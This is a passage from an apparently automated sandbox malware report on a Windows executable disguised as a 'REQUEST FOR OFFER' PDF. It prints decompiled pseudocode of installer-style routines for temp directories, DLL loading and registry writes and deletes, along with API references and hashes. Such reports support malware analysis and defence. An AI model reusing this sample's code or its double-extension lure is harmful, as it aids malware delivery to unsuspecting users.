															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x38));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402660
0x00402662
0x00402665
0x00402667
0x0040266a
0x0040266f
0x00402673
0x00402676
0x00402679
0x00402adb
0x00402ade
0x0040267f
0x0040267f
0x00402686
0x00402688
0x00402688
0x0040268e
0x004027f2
0x004027f2
0x004027f5
0x004027fa
0x004015b6
0x004028a1
0x004028a1
0x00000000
0x00402694
0x00402695
0x004026a0
0x004026a3
0x004026af
0x004026b3
0x0040274b
0x00402763
0x00402773
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004026b9
0x004026b9
0x004026bc
0x004026bd
0x004026c0
0x004026c5
0x004026cc
0x004026d4
0x00000000
0x004026da
0x004026da
0x004026df
0x00000000
0x004026e5
0x004026e5
0x004026ed
0x004026f0
0x004026f3
0x004027ae
0x004027b5
0x004026f9
0x004026ff
0x0040270b
0x00402775
0x00402775
0x0040270d
0x0040270d
0x00402710
0x00402712
0x00402712
0x00402712
0x00402715
0x0040271a
0x0040271d
0x00000000
0x00000000
0x0040271f
0x00402722
0x0040272a
0x00402736
0x00402744
0x00000000
0x00402746
0x00000000
0x00402746
0x00000000
0x00402744
0x00402712
0x00402778
0x0040277b
0x00000000
0x0040277d
0x00402782
0x004027c3
0x004027e5
0x004027ec
0x004027d1
0x004027d1
0x004027d4
0x004027d7
0x004027da
0x004027da
0x00000000
0x0040278b
0x0040278b
0x0040278e
0x00402791
0x00402797
0x0040279b
0x0040279e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040279e
0x00402782
0x0040277b
0x004026f3
0x004026df
0x004026d4
0x00000000
0x004027a0
0x004027a0
0x004027a3
0x004027ac
0x00000000
0x004026a3
0x0040268e
0x00402ae4
0x00402aea

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026CC
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740

Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC

Strings

9, xrefs: 004026AF

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405840(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040584b
0x0040584f
0x00405852
0x00405858
0x0040585c
0x00405860
0x00405868
0x0040586f
0x00405875
0x0040587c
0x00405883
0x0040588b
0x0040588d
0x00000000
0x0040588d
0x00405897
0x0040589e
0x004058b4
0x00000000
0x00000000
0x00000000
0x004058b6
0x004058ba

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
GetLastError.KERNEL32 ref: 00405897
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
GetLastError.KERNEL32 ref: 004058B6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
C:\Users\user\Desktop, xrefs: 00405840

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040657C(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x00406593
0x0040659c
0x0040659e
0x0040659e
0x004065a2
0x004065b5
0x004065af
0x004065af
0x004065af
0x004065ce
0x004065e2
0x004065e9

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
wsprintfW.USER32 ref: 004065CE
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2

Strings

UXTHEME, xrefs: 00406585
%s%S.dll, xrefs: 004065C8
\, xrefs: 004065A4

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004023EA(void* __eax, intOrPtr __edx) {
				void* _t18;
				short* _t21;
				int _t22;
				long _t25;
				char _t27;
				int _t30;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t41;

				_t35 = __edx;
				_t18 = E00402D48(__eax);
				_t39 =  *((intOrPtr*)(_t41 - 0x18));
				 *(_t41 - 0x50) =  *(_t41 - 0x14);
				 *(_t41 - 0x38) = E00402C53(2);
				_t21 = E00402C53(0x11);
				_t34 =  *0x42a2f0 | 0x00000002;
				 *(_t41 - 4) = 1;
				_t22 = RegCreateKeyExW(_t18, _t21, _t30, _t30, _t30,  *0x42a2f0 | 0x00000002, _t30, _t41 + 8, _t30); // executed
				if(_t22 == 0) {
					if(_t39 == 1) {
						E00402C53(0x23);
						_t22 = lstrlenW(0x40b5d8) + _t29 + 2;
					}
					if(_t39 == 4) {
						_t27 = E00402C31(3);
						_pop(_t34);
						 *0x40b5d8 = _t27;
						 *((intOrPtr*)(_t41 - 0x30)) = _t35;
						_t22 = _t39;
					}
					if(_t39 == 3) {
						_t22 = E0040317B(_t34,  *((intOrPtr*)(_t41 - 0x1c)), _t30, 0x40b5d8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t41 + 8),  *(_t41 - 0x38), _t30,  *(_t41 - 0x50), 0x40b5d8, _t22); // executed
					if(_t25 == 0) {
						 *(_t41 - 4) = _t30;
					}
					_push( *(_t41 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t41 - 4);
				return 0;
			}

0x004023ea
0x004023eb
0x004023f0
0x004023fa
0x00402404
0x00402407
0x00402417
0x00402421
0x00402428
0x00402430
0x0040243e
0x00402442
0x0040244d
0x0040244d
0x00402454
0x00402458
0x0040245d
0x0040245e
0x00402464
0x00402467
0x00402467
0x0040246b
0x00402477
0x00402477
0x00402488
0x00402490
0x00402492
0x00402492
0x00402495
0x0040256d
0x0040256d
0x00402ade
0x00402aea

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq493.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq493.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq493.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D

Strings

C:\Users\user\AppData\Local\Temp\nsq493.tmp, xrefs: 00402439, 00402447, 0040245E, 00402472, 0040247D

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsq493.tmp
API String ID: 1356686001-2246456587
Opcode ID: 806efaed5b4bfeedac683a88307ba1cf055b8b511b22054478da86a351440c5a
Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
Opcode Fuzzy Hash: 806efaed5b4bfeedac683a88307ba1cf055b8b511b22054478da86a351440c5a
Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68

Uniqueness

Uniqueness Score: -1.00%

Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405E16(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a584; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405e1c
0x00405e22
0x00405e23
0x00405e23
0x00405e28
0x00405e29
0x00405e2c
0x00405e31
0x00405e34
0x00405e3e
0x00405e4b
0x00405e4f
0x00405e57
0x00000000
0x00000000
0x00405e5b
0x00000000
0x00405e5d
0x00405e5d
0x00405e5d
0x00405e60
0x00405e63
0x00405e63
0x00405e66
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E34
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
nsa, xrefs: 00405E23
"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 00405E16

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1764279567
Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64

Uniqueness

Uniqueness Score: -1.00%

Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402C93(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x42a2f0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402C93(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004065EC(3);
					if(_t27 == 0) {
						if( *0x42a2f0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42a2f0, 0);
				}
				return _t18;
			}

0x00402cb4
0x00402cbc
0x00402ce4
0x00402cce
0x00402d1e
0x00402d24
0x00000000
0x00402d26
0x00402ce2
0x00000000
0x00000000
0x00402ce2
0x00402cf9
0x00402d01
0x00402d08
0x00402d34
0x00000000
0x00000000
0x00402d3c
0x00402d44
0x00000000
0x00000000
0x00000000
0x00402d44
0x00000000
0x00402d17
0x00402d2b

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402CB4
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
RegCloseKey.ADVAPI32(?), ref: 00402CF9
RegCloseKey.ADVAPI32(?), ref: 00402D1E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
Opcode Fuzzy Hash: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1);
				_t34 = E10001B18();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C31(3);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C31(4);
